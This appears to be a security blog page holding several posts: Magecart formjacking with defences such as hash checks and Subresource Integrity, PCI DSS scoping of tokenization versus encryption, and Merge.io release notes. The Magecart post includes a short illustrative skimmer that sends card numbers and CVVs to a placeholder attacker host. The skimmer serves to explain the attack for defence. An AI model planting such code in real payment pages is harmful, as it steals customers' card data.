The recent breaches at Ticketmaster, British Airways, and Newegg attributed to the hacking group Magecart have many e-commerce merchants taking a closer look at their potential exposure. And rightfully so.
The injected code that compromised credit card data in these breaches leverages the logical structure of the Document Object Model (DOM) to access and manipulate anything on the page. This includes the ability to send data to a malicious entity behind the scenes of a normally operating payment page, as in the case of these Magecart breaches; this technique is also known as formjacking. With access to the DOM, many common security measures are effectively bypassed, including embedded iFrames and even browser-based encryption implemented to better secure payment data as it is collected from the customer.
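To make this concrete, here is a minimal sketch of what a skimmer of this kind can look like. The form selector, field names, and exfiltration URL are all hypothetical, and real Magecart payloads are heavily obfuscated, but the underlying mechanics are roughly this simple:

```typescript
// Illustrative sketch of a DOM-based skimmer (hypothetical selectors and URL).
// Real skimmers are obfuscated, but the mechanics are essentially these.
document.querySelector("form#payment")?.addEventListener("submit", () => {
  const stolen = {
    pan: document.querySelector<HTMLInputElement>("input[name=card-number]")?.value,
    cvv: document.querySelector<HTMLInputElement>("input[name=cvv]")?.value,
  };
  // Exfiltrate in the background; the page continues submitting normally,
  // so neither the customer nor the merchant sees anything unusual.
  navigator.sendBeacon("https://attacker.example/collect", JSON.stringify(stolen));
});
```

Because the skimmer runs with the same DOM privileges as any legitimate script on the page, it can read form fields as the customer fills them in, which is why page-level protections offer little defense once the source is compromised.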
Once the attackers gain access to the source code, they own any data that you are collecting from the user.
To make things more difficult, today's web pages commonly load dozens of scripts from many different locations, including internal systems as well as third-party providers. Any one of these scripts has the ability to manipulate the data elements being collected from the customer.
I believe that this type of attack will continue to grow due to the number of possible infection vectors on a given page and the value of the customer data that is at risk. I also believe that this will eventually drive changes in the PCI council's approach to e-commerce guidelines and requirements, hopefully placing more emphasis on server-based controls and a much-needed focus on securing the source code and development pipeline.
What can we do to help reduce the risk of these types of attacks?
Secure the source code pipeline: So much of our technology world these days is powered by code: infrastructure changes, automation, and of course our applications. The entire code pipeline should be a focus for security controls to ensure the integrity of the code from source, to build, to deployment. Consider implementing hashing checks throughout this process and alerting when hashes do not match, as sketched below. This provides a mechanism to ensure that what was developed at least makes it to the intended destination.
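As a sketch of the hashing idea, assuming Node.js and a hypothetical expected.json manifest produced at build time (your pipeline's artifact names and manifest format will differ):

```typescript
// Minimal sketch: verify deployed artifacts against hashes recorded at build
// time. "expected.json" and the artifact paths are placeholder names.
import { createHash } from "node:crypto";
import { readFileSync } from "node:fs";

function sha256Of(path: string): string {
  return createHash("sha256").update(readFileSync(path)).digest("hex");
}

// The manifest maps artifact paths to the hashes captured at build time.
const expected: Record<string, string> = JSON.parse(
  readFileSync("expected.json", "utf8"),
);

for (const [artifact, hash] of Object.entries(expected)) {
  if (sha256Of(artifact) !== hash) {
    // In a real pipeline this should alert, not just log.
    console.error(`Integrity check failed for ${artifact}`);
    process.exitCode = 1;
  }
}
```

Running a check like this at each stage (source to build, build to deployment) gives you the alerting hook for when hashes do not match.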
Secure the origin servers: Once our servers receive the validated source code, we should have a way to periodically check the code that is running to ensure that it hasn't changed. This can be accomplished through various scripting methods, automation tools, or open-source tools such as OSQuery.
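One way to script this, as a rough sketch (the web root path and check interval are placeholders; purpose-built tools such as OSQuery offer more robust file integrity monitoring):

```typescript
// Minimal sketch: re-hash deployed files on a schedule and compare against a
// baseline captured at deploy time. "/var/www/html" is a placeholder path.
import { createHash } from "node:crypto";
import { readdirSync, readFileSync, statSync } from "node:fs";
import { join } from "node:path";

function snapshot(dir: string): Map<string, string> {
  const hashes = new Map<string, string>();
  for (const name of readdirSync(dir)) {
    const path = join(dir, name);
    if (statSync(path).isDirectory()) {
      for (const [p, h] of snapshot(path)) hashes.set(p, h);
    } else {
      hashes.set(path, createHash("sha256").update(readFileSync(path)).digest("hex"));
    }
  }
  return hashes;
}

const baseline = snapshot("/var/www/html"); // captured right after deployment

setInterval(() => {
  const current = snapshot("/var/www/html");
  for (const [path, hash] of baseline) {
    if (current.get(path) !== hash) {
      console.error(`ALERT: ${path} has changed since deployment`);
    }
  }
}, 5 * 60 * 1000); // check every five minutes
```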
Implement Subresource Integrity checks: The use of Content Security Policies in conjunction with Subresource Integrity can ensure that the files your pages fetch from anywhere (a third party, a CDN, or internally) have been delivered without any changes. This is accomplished by publishing cryptographic hashes of the known-good scripts, which the browser verifies prior to execution. Once again, it is important to note that if the attacker has access to the origin source code, all of this behavior can be modified.
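Generating the integrity value is straightforward; here is a sketch using Node.js (the file and CDN names are placeholders):

```typescript
// Minimal sketch: compute the SRI integrity value (base64-encoded SHA-384)
// for a known-good copy of a script. File and CDN names are placeholders.
import { createHash } from "node:crypto";
import { readFileSync } from "node:fs";

const digest = createHash("sha384")
  .update(readFileSync("vendor/checkout.js"))
  .digest("base64");

// The browser refuses to execute the fetched script if its bytes do not
// hash to this value.
console.log(
  `<script src="https://cdn.example/checkout.js" ` +
  `integrity="sha384-${digest}" crossorigin="anonymous"></script>`,
);
```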
The added measures of knowing that the code you authored is what is running on your servers, and having visibility when that changes, can help reduce the risk of these types of attacks for your organization. Leverage automation as much as possible to ensure these measures don't have a negative impact on the efficiency of deploying often.
- British Airways Breach (RiskIQ)
- Ticketmaster Breach (RiskIQ)
- Newegg Breach (RiskIQ)
- Shopper Approved Breach (RiskIQ)
- Subresource Integrity
Many organizations seek ways to reduce their scope for PCI DSS. While there are many different methods of reducing scope, I want to focus specifically on tokenization and encryption of the primary account number (PAN).
For the purposes of this post, we will assume that the encryption and tokenization methods used meet the appropriate requirements to protect the PAN, and that unauthorized attempts to reverse the token or encrypted value would be computationally infeasible. Additionally, I want to note that this post is not arguing the technical strengths or differences of tokenization versus encryption; it only points out the council's documented view on PCI DSS scope as it relates to the key and vault management aspects of these technologies.
From the PCI Security Standards Glossary of Terms: Encryption is the process of converting information into an unintelligible form except to holders of a specific cryptographic key.
From the PCI DSS Tokenization Guidelines information supplement, tokenization is defined as a process by which the primary account number (PAN) is replaced with a surrogate value called a token. De-tokenization is the reverse process of redeeming a token for its associated PAN value.
For both tokenization and encryption, the overall principle is that valuable data is transformed into non-valuable data through a given mechanism. For encryption, that mechanism is the encryption process and the keys. For tokenization, the mechanism is the tokenization process and the relationship between the token and the PAN. Additionally, de-tokenization and decryption are similar in that there is a process by which I provide my encrypted or tokenized data to a mechanism in order to receive the PAN in return; a sketch of this parallel follows below.
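Here is a toy sketch of that parallel (not a production design: the vault is an in-memory map and the key is generated in-process, purely to illustrate the shared principle). Both mechanisms take a PAN in and hand a surrogate back, and both reverse the exchange on request:

```typescript
// Toy sketch of the parallel between tokenization and encryption.
// Not production code: the vault is an in-memory map and the key is
// generated in-process, purely to illustrate the shared principle.
import { createCipheriv, createDecipheriv, randomBytes } from "node:crypto";

// Tokenization: the mechanism is the vault (the token-to-PAN relationship).
const vault = new Map<string, string>();

function tokenize(pan: string): string {
  const token = randomBytes(16).toString("hex"); // random surrogate value
  vault.set(token, pan);
  return token;
}

function detokenize(token: string): string | undefined {
  return vault.get(token); // redeem the token for its associated PAN
}

// Encryption: the mechanism is the cipher and the key.
const key = randomBytes(32); // AES-256 key

function encryptPan(pan: string): { iv: string; data: string; tag: string } {
  const iv = randomBytes(12);
  const cipher = createCipheriv("aes-256-gcm", key, iv);
  const data = Buffer.concat([cipher.update(pan, "utf8"), cipher.final()]);
  return {
    iv: iv.toString("hex"),
    data: data.toString("hex"),
    tag: cipher.getAuthTag().toString("hex"),
  };
}

function decryptPan(c: { iv: string; data: string; tag: string }): string {
  const decipher = createDecipheriv("aes-256-gcm", key, Buffer.from(c.iv, "hex"));
  decipher.setAuthTag(Buffer.from(c.tag, "hex"));
  return Buffer.concat([
    decipher.update(Buffer.from(c.data, "hex")),
    decipher.final(),
  ]).toString("utf8");
}
```

In both cases, whoever controls the mechanism (the vault or the keys) can recover the PAN, which is exactly why the scoping question should arguably be answered the same way for both.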
The guidance provided in the PCI DSS Tokenization Guidelines of August 2011 notes that tokenization can be used as a method of reducing the scope of PCI in an organization. There are obviously many considerations for de-scoping using tokenization, and they are adequately covered in that document. But it is important to note that the document does not seem to link de-scoping with who manages the tokenization process, vault, or tables.
The topic of de-scoping using encryption is covered by PCI DSS FAQ article 2086, where it is noted that scope reduction can be achieved only if the merchant or service provider does not have access to the encryption keys.
If we follow this logic through to its conclusion, the council seems to be saying that tokenization can be used as a method for scope reduction without restriction on who manages the tokenization mechanism, but encryption can be used only if the merchant or service provider has no access to the keying mechanism.
Here we have two nearly identical fundamental approaches to protecting data. Each yields meaningless data that can be exchanged for the valid data through a particular mechanism. Depending on the details of the architecture, each is capable of adequately securing cardholder data. However, it seems that the council has added additional rules around scope reduction using encryption versus tokenization.
First of all, I do not believe that the council should dictate the ability to de-scope based on a potential management issue. It is feasible to architect effective key management while keeping clear segregation of duties within the same organization or entity. I do not think it is the council's place to prohibit a solution based upon the predetermination that an organization cannot maintain effective segregation of duties or other risk mitigation strategies. An enterprise encryption strategy isn't acquired as an off-the-shelf widget that I just plug in and turn on. There are many different potential elements that can make up a solution (one-time use, long-term storage, tokenization hybrids, etc.). It should be left up to the QSA to determine whether the implemented solution meets the intent of the requirements.
But more important for the purposes of this discussion is the inconsistent view of two nearly identical fundamental approaches to protecting sensitive data and their accompanying keying systems. Why is the council's position on these two scenarios different? I hope that the council will address this ambiguity in upcoming FAQs or supplemental documentation, as the information currently available is contradictory in nature.
Merge.io now supports the direct import of the Foundstone/MVM Risk_Data.xml file. The Foundstone data is supplemented with additional vulnerability data from the National Vulnerability Database for use in the Merge.io platform.
Added National Vulnerability Database
The addition of 2 million records of vulnerability data will greatly enhance the vulnerability information that we have to correlate with customers' data. See our blog post on the addition of the NVD to Merge.io.
Better charting and graphing support
We have changed our charting and graphing libraries to support better reporting and dashboard functionality.
Added better caching in the import process to improve performance.
We have added project-based reporting. The project report outlines the risk of the project's vulnerabilities, the current status of remediation and validation, and the specific filtering rules that were applied to determine which vulnerabilities were to be remediated and which were not. The report is a PDF that includes the following sections:
- Project Summary
- Vulnerability Summary
- Vulnerability Validation
- Risk Profile Filters
You can now leverage the remediation workflow, validation and custom filtering power of the Merge.io platform for your McAfee Vulnerability Manager / Foundstone scan data!
Adding Foundstone / MVM data to your Merge.io project allows you to sift through volumes of vulnerabilities, automatically select those that meet your policies (through our custom risk profiles), and track them through remediation and validation of closure. To import Foundstone / MVM data into Merge.io, simply export your scan results in XML format and upload the Risk_Data.xml file to your Merge.io project.
Need to comply with PCI DSS requirements? Import your scan results and apply our built-in PCI Risk Profile. Only those vulnerabilities that PCI requires to be fixed are added to your project.